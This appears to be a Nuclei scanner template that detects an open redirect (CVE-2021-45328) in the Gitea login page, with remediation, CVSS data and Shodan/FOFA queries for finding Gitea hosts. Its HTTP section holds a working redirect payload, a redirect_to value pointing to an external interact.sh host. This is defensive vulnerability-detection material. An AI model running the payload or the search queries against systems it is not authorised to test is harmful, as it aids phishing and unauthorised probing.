id: CVE-2021-45328 info: name: Gitea < 1.4.3 - Open Redirect author: ritikchaddha severity: medium description: | Gitea before version 1.4.3 is affected by URL Redirection to Untrusted Site ('Open Redirect') via internal URLs. The vulnerability exists in the redirect_to parameter used on the login page (/user/login). Due to improper validation of the redirect URL, an attacker can craft a malicious link that redirects authenticated users to an arbitrary external website after login. impact: | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Gitea to version 1.4.3 or later to fix the open redirect vulnerability. reference: - https://github.com/go-gitea/gitea/issues/4332 - https://nvd.nist.gov/vuln/detail/CVE-2021-45328 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-45328 cwe-id: CWE-601 epss-score: 0.00625 epss-percentile: 0.70557 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: gitea product: gitea shodan-query: - title:"Gitea" - http.html:"powered by gitea version" - http.title:"gitea" - cpe:"cpe:2.3:a:gitea:gitea" fofa-query: - body="powered by gitea version" - title="gitea" google-query: intitle:"gitea" tags: cve,cve2021,redirect,gitea http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: redirect_to=//interact.sh/ _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} matchers-condition: and matchers: - type: regex part: header_2 regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - type: status status: - 302 extractors: - type: regex name: csrf group: 1 regex: - 'name="_csrf" value="(.*)"' internal: true # digest: 490a0046304402207e1b2bee74025534ab1f86645b1d9b45b213942b347ce2ace459933bf138290902202491a7cc45455846f5f37e20675aa2bf00c19a47bd9c4e446dd112b9b5c4a0d5:922c64590222798bb761d5b6d8e72950